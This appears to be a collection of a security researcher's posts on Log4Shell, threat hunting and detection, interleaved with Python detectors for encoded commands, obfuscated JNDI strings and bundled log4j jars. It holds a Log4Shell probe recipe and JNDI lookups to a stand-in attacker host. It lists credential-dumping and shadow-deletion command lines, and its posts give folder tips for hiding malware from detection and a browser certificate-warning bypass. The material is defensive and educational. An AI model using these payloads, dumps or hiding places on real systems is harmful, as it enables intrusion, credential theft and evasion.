I've decided to put a screenshot showing the hex editor view of a Turla Kazuar sample behind acrylic glass on my desk to always remind me why I am doing all this ...
because I 💛 to be a pain in the neck of the bad guys
How to test your apps for
#log4shell
vulnerability
1. Generate a DNS token
2. Wrap that token in
Prefix: ${jndi:ldap://
Suffix: /a}
3. Use that value in search forms, profile data, settings etc. of your apps
4. Get notified when you triggered a reaction
Can we get a Kitchen Nightmares but with IT departments and a cyber Gordon Ramsay that shouts at people for not having an asset inventory, log or vulnerability management?
I would love that 🖤
First security application I install on ...
macOS: LittleSnitch
Linux Server: Fail2ban
Linux Workstation: etckeeper
Windows Workstation: GlassWire
Windows Server: Sysmon
---
What are yours?
People use "grep" after "cat" as it allows for a quicker alteration of the searched keyword, enhancing their workflow.
By simply pressing the arrow up, they can easily edit the last command and quickly change the search keyword, which is a lot more efficient than navigating
InfoSec professional life cycle
20y-30y
Uh, someone found a vuln!
30y-40y
I've found a vuln!
40y-50y
I can detect / protect you from vulns!
50y-60y
Chinese threat actor has found vuln faster than you!
60y+
I breed chicken and cultivate orange trees
If you're an attacker with local admin privs, consider storing your malicious files in
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection
MS tends to store noisy and shady scripts there, leading many security vendors to eventually exclude that folder
A DFIR friend told me that one of his customers, who spent a full week finding & remediating log4j vulnerabilities, got ransomed through an unpatched Confluence vulnerability that was published in August
#Log4j
#Log4Shell
The problem in IT security is that fascinating things are often unnecessary while boring things are usually essential.
We focus too much on the fancy stuff and can't get the fundamental things right.
Detect suspicious keyboard layout loads with this
#Sysmon
config & Sigma rule
> Example: Allows you to detect CN 🇨🇳, VN 🇻🇳, IR 🇮🇷 remote users that connect to your servers maintained by US 🇺🇸 staff only
Sysmon Config
Sigma Rule
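The Sysmon config and Sigma rule referenced above are images that did not survive extraction, so here is an added example (mine, not the author's config or rule) of the same detection idea applied to raw Sysmon records. It assumes that a keyboard layout load shows up as a Sysmon Event ID 7 (image loaded) of a kbd*.dll from System32, uses constructed, simplified sample events, and treats every layout DLL outside an allowlist (US only, as in the tweet's scenario) as suspicious:

```python
import re

# Constructed, simplified Sysmon Event ID 7 (image loaded) records; real events
# carry more fields (hashes, signature, ProcessGuid, ...). Assumption: a keyboard
# layout load is visible as an image load of a kbd*.dll from System32.
SAMPLE_EVENTS = [
    r"EventID=7 Image=C:\Windows\explorer.exe ImageLoaded=C:\Windows\System32\KBDUS.DLL User=CORP\jdoe",
    r"EventID=7 Image=C:\Windows\System32\svchost.exe ImageLoaded=C:\Windows\System32\ntdll.dll User=NT AUTHORITY\SYSTEM",
    r"EventID=7 Image=C:\Windows\explorer.exe ImageLoaded=C:\Windows\System32\KBDRU.DLL User=CORP\svc-backup",
    r"EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c whoami User=CORP\jdoe",
]

# Layouts the organisation actually uses (the tweet's scenario: US staff only).
ALLOWED_LAYOUTS = {"KBDUS.DLL"}

# key=value pairs whose values may contain spaces (stop before the next " key=")
FIELD = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")
# keyboard layout DLLs are named kbd<layout>.dll
LAYOUT_DLL = re.compile(r"\\(kbd[a-z0-9]+\.dll)$", re.IGNORECASE)


def parse_event(line):
    """Turn one 'key=value key=value' record into a dict."""
    return {k: v for k, v in FIELD.findall(line)}


def suspicious_layout_loads(events, allowed=ALLOWED_LAYOUTS):
    """Return (user, process, layout dll) for every layout load not on the allowlist."""
    allowed_upper = {a.upper() for a in allowed}
    hits = []
    for line in events:
        ev = parse_event(line)
        if ev.get("EventID") != "7":          # only image-load events matter here
            continue
        m = LAYOUT_DLL.search(ev.get("ImageLoaded", ""))
        if not m:
            continue
        dll = m.group(1).upper()
        if dll not in allowed_upper:
            hits.append((ev.get("User", "?"), ev.get("Image", "?"), dll))
    return hits


if __name__ == "__main__":
    for user, proc, dll in suspicious_layout_loads(SAMPLE_EVENTS):
        print(f"ALERT: {user} loaded keyboard layout {dll} in {proc}")
```

The allowlist is the tunable part: a layout that one of your own users legitimately needs goes into ALLOWED_LAYOUTS, everything else is worth a look, especially when the loading process belongs to an interactive session on a server.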
No1 reason why people don't publish their code
Me: Ah, that's a useful tool. Do you plan to publish this?
Him: No, why should I?
Me: Others face the same problems.
Him: They would only laugh at my shitty code - I'll refactor it.
And that never happens.
TIL whenever you see an SSL certificate error and the browser doesn't let you continue - even at your own risk, you can just type 'thisisunsafe' to bypass the protection
After years in security monitoring, detection engineering, training ML models and writing detections, you'll learn one thing:
The problem isn't that malware tries to look like legitimate software, it's that software does a lot of things that you'd only expect from malware
Imagine you'd get access to an unknown SIEM of a new customer & would be given 10min to find malicious activity by using keyword searches on raw data, what would you search for?
I'll start
'.dmp full'
'whoami'
'delete shadows'
'FromBase64String'
'save HKLM\SAM'
' -w hidden '
It's not always possible to scan every device in your network for crypto mining malware (Linux boxes, IoT, app containers)
But you could check your DNS & firewall logs for connections to the limited number of mining pools
I've compiled a list for you
There is Base64 encoded malicious stuff that one sees very frequently
I made a cheat sheet for us so that we can learn and spot malicious stuff faster ⚡️
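Added example (my code, not the author's cheat sheet or SIEM content) that ties the two previous posts together: it runs the keyword list from the SIEM thread above over raw lines, and it also decodes base64 runs found in those lines (UTF-16LE for PowerShell -EncodedCommand, UTF-8 otherwise) and searches the decoded text too, which is exactly where a plain keyword search stops seeing. The sample lines are constructed, not real telemetry:

```python
import base64
import binascii
import re

# Keyword list from the thread above, matched case-insensitively.
KEYWORDS = [".dmp full", "whoami", "delete shadows", "FromBase64String",
            r"save HKLM\SAM", " -w hidden "]

# A run of base64 alphabet characters long enough to be worth decoding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_blob(blob):
    """Decode one base64 run to text, or return None if it is not decodable text.
    PowerShell -EncodedCommand uses UTF-16LE, so that is tried when the byte
    pattern (every second byte zero) suggests it; otherwise UTF-8."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw:
        return None
    looks_utf16 = len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
    try:
        text = raw.decode("utf-16-le" if looks_utf16 else "utf-8")
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def find_keywords(text):
    low = text.lower()
    return [kw for kw in KEYWORDS if kw.lower() in low]


def scan(lines):
    """Return (line index, keyword, 'raw' | 'decoded') for every hit."""
    hits = []
    for i, line in enumerate(lines):
        for kw in find_keywords(line):
            hits.append((i, kw, "raw"))
        for blob in B64_BLOB.findall(line):
            text = decode_blob(blob)
            if text is None:
                continue
            for kw in find_keywords(text):
                hits.append((i, kw, "decoded"))
    return hits


def _enc_ps(command):
    """Build a PowerShell -EncodedCommand argument (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample lines (not real telemetry), roughly in the shape of
# process-creation command lines and one web proxy request.
SAMPLE_LINES = [
    "powershell.exe -nop -w hidden -enc " + _enc_ps("vssadmin delete shadows /all /quiet"),
    r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\lsass.dmp full",
    r"reg.exe save HKLM\SAM C:\Windows\Temp\sam.hiv",
    "svchost.exe -k netsvcs -p",
    "GET /api/me Authorization: Bearer " + base64.b64encode(b"session-id=1234567890abcdef").decode("ascii"),
]

if __name__ == "__main__":
    for i, kw, src in scan(SAMPLE_LINES):
        print(f"line {i}: {kw!r} ({src})")
```

The first sample line is the instructive one: the raw text only matches ' -w hidden ', while the encoded command inside it matches 'delete shadows'. The UTF-16 heuristic (every second byte is zero) keeps random tokens and session cookies from being misread as PowerShell.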
The sad truth about work is that 97% of the victims don’t have a blue team, no SIEM, no SOC and don’t monitor Twitter for new threats
They have an admin or IT service provider that manages users, mail boxes, installs printers & once in a while a new AV
If I were evil, I wouldn't attack 20-30 target companies in expensive campaigns but instead the developers of uBlock, Notepad++ and PuTTY to own the whole world
Linus is the Gordon Ramsay of the Linux Kernel. I'd love to watch a show called "Kernel Nightmares" in which he yells at developers "What is this? Look at this crap!" "The socket is raw!" "Close it down!" "that was an idiot branch switch"
Give me a list of well known tools used by adversaries
Novice:
nmap, Cain, hydra, tcpdump, arpspoof
Intermediate:
Htran, Mimikatz, smbexec, Lazagne, PwDump
Expert:
PowerShell, VBA macros, JavaScript, WMI, certutil, legitimate signed executables
Nephew asks: How did you get the source code from these old magazines, when there was no link under the article to download it? GitHub isn't that old, is it?
Me: We read it and typed it.
He: *big eyes*
Me: Yes, all of it.
What people seem to miss:
The
#Log4Shell
vulnerability isn't just an RCE 0day.
It's a vulnerability that causes hundreds and thousands of 0days in all kinds of software products.
It's a 0day cluster bomb.
@stillgray
What always baffles me is that everyone "deserves" to live a certain way or get something, but what about the people who have earned their salary but don't get it because they were forced to pay for the things that others "deserve"?
Log4Shell Detector v0.1
Python based scanner that tries to detect even the most obfuscated versions of the exploit code
- first version: I did a few tests, not more
- please provide pull requests with improvements
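The detector itself is not reproduced on this page, so here is an added example of my own (not the author's Log4Shell Detector, and not Log4j's code) that shows the core idea behind detecting the obfuscated variants, and it doubles as the detection side of the testing recipe at the top of the page: instead of matching `${jndi:` directly, it percent-decodes the line and then repeatedly resolves the innermost `${...}` lookups the way Log4j's substitution would (`${lower:..}`, `${upper:..}`, `${date:'..'}` and the `${key:-default}` form) until the literal `${jndi:` surfaces. The resolution rules are an approximation of Log4j's behaviour, and the log lines are constructed:

```python
import re
from urllib.parse import unquote

# innermost ${...} (no nested ${ or } inside) and the thing we finally look for
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(inner):
    """Approximate what Log4j's lookup substitution turns one innermost lookup into."""
    if ":-" in inner:                       # ${key:-default}: unknown key -> default
        return inner.rsplit(":-", 1)[1]
    low = inner.lower()
    if low.startswith("lower:"):
        return inner[6:].lower()
    if low.startswith("upper:"):
        return inner[6:].upper()
    if low.startswith("date:"):            # ${date:'j'}: quoted text is emitted literally
        return inner[5:].strip("'")
    return inner                            # anything else: keep the raw content


def normalize(text, max_rounds=200):
    """Percent-decode (twice, for double-encoded requests) and resolve nested lookups
    from the inside out until ${jndi: appears or nothing is left to resolve."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):             # each round removes one ${...}, so this terminates
        if JNDI.search(text):
            break
        resolved = LOOKUP.sub(lambda m: _resolve(m.group(1)), text, count=1)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(line):
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Indices of the lines that contain a (possibly obfuscated) JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed web server log lines (hostnames use the reserved .invalid TLD).
SAMPLE_LINES = [
    'GET /search?q=shoes HTTP/1.1 200 "Mozilla/5.0"',
    'GET /search?q=${jndi:ldap://attacker.invalid/a} HTTP/1.1 200 "Mozilla/5.0"',
    'GET / HTTP/1.1 200 "${${lower:j}${upper:n}di:ldap://attacker.invalid/a}"',
    'GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.invalid%2Fa%7D HTTP/1.1',
    'GET /?t=${date:yyyy-MM-dd} HTTP/1.1 404 "curl/7.79"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(f"line {i}: {normalize(SAMPLE_LINES[i])}")
```

The last sample line is there on purpose: a harmless `${date:...}` lookup is resolved and dropped without an alert, which is the behaviour a signature that simply greps for `${` would not give you.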
HardenTools
a collection of simple utilities designed to disable a number of "features" exposed by Microsoft Windows
> I've just had a chat with s/o who hasn't heard of it and thought, now that Win11 is out, I should share it again
If I'd write malware, I'd drop it into
\AppData\Local\Microsoft\TeamsMeetingAddin\
- user has write access
- probably excluded from some detections
- SOC analyst: 'ah, just another MS Teams quirk. we've seen so many.'
- availability has top priority ;)
Just got asked for a list of cybersecurity certifications
I always point people to this specific website for that, and typically, their response is a solid "wtf"
Find evidence of log4j usage on Linux servers with these 3 commands
ps aux | egrep '[l]og4j'
find / -iname "log4j*"
lsof | grep log4j
Find places to which your applications write logs
lsof | grep '\.log'
#log4shell
#log4j
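For the same job done in a scripted way, here is an added example of my own (not the author's commands, not a project's scanner) that goes one step further than the three commands above: besides files whose name contains log4j, it opens jar/war/ear archives, recurses into archives nested inside them, and reports the JndiLookup class that log4j-core ships and that Log4Shell abuses, so a vulnerable copy bundled inside an uber-jar with an unrelated name is still found. The demo directory it builds is constructed (stub entries, placeholder version string), not a real artefact:

```python
import io
import os
import tempfile
import zipfile

# The class that Log4Shell abuses; its presence inside an archive means a
# log4j-core build with the JNDI lookup is bundled, whatever the archive is called.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
MAX_DEPTH = 5   # nested archives (jar inside war inside ear ...) are common


def _scan_archive(zf, where, findings, depth):
    for name in zf.namelist():
        if name.lower() == JNDI_CLASS.lower():
            findings.append((where, "JndiLookup.class present"))
        elif "log4j" in os.path.basename(name).lower():
            findings.append((where + "!" + name, "log4j in entry name"))
        if name.lower().endswith(ARCHIVE_EXT) and depth < MAX_DEPTH:
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except (zipfile.BadZipFile, KeyError, RuntimeError):
                continue                      # corrupt or encrypted entry: skip
            with nested:
                _scan_archive(nested, where + "!" + name, findings, depth + 1)


def find_log4j(root):
    """Walk root; report files named like log4j and archives that contain it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if "log4j" in fname.lower():
                findings.append((path, "log4j in file name"))
            if fname.lower().endswith(ARCHIVE_EXT) and zipfile.is_zipfile(path):
                try:
                    with zipfile.ZipFile(path) as zf:
                        _scan_archive(zf, path, findings, 0)
                except zipfile.BadZipFile:
                    continue
    return findings


def build_demo():
    """Create a throw-away directory holding a constructed uber-jar that bundles a
    stub log4j-core jar (zero-byte entries, placeholder version); returns the path."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(JNDI_CLASS, b"")                      # stub, not a real class file
    with zipfile.ZipFile(os.path.join(root, "app.jar"), "w") as z:
        z.writestr("com/example/Main.class", b"")
        z.writestr("lib/log4j-core-X.Y.Z.jar", inner.getvalue())   # placeholder version
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("nothing to see here\n")
    return root


if __name__ == "__main__":
    for where, why in find_log4j(build_demo()):
        print(f"{why}: {where}")
```

Run it against / (or the application directories) with the same expectations as the find command: it tells you where log4j lives, not which version it is, so each hit still needs a look at the jar's manifest or pom.properties.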
Log Sources
- ordered by priority
- with ratings in different categories
- personal and highly subjective assessment
- from my most recent slide deck on low hanging fruits in security monitoring
#SIEM
#SecurityMonitoring
#ThreatHunting
Idea: Microsoft should reactivate clippy to help sysadmins with the newest threats that won't be fixed with a KB patch but require admins to find, read, understand and apply advisories
Clippy could ask questions like these:
What would a time traveller from the year 2005 think if he heard that the software used in 95% of today's attacks is sold by a legal company registered in the US?
What would you think of it if it were registered in Russia?
APT Simulator
A toolset to make a system look as if it were the victim of an APT attack
> quick & dirty & batch, but a better adversary simulation than Nmap+Cain+EICAR
Haha .. I did it .. Raccine - a simple Ransomware Vaccine
- uses debugger registration to intercept vssadmin.exe invocations
- collects process tree pids for kills
- PoC as weekend project
- my C code sucks, but it works
The best way to learn how real threat actors operate is to read the many published threat reports on their activity
DFIR Report
APT Groups and Operations
ORKL
I’ll add more links in the replies 🧵
My Signature Creation Mind Map
Input: Sample
> the things that I check to create YARA signatures, Sigma rules or IOCs
> or pivot to related samples in order to improve the signatures / rules
I have a special Christmas present for you guys 🎁
I took the time this morning & completely reworked my 'God Mode YARA Rule'
It's a PoC aimed at crafting a single rule that covers a vast array of threats with minimal FPs
Merry Christmas to you all 🎄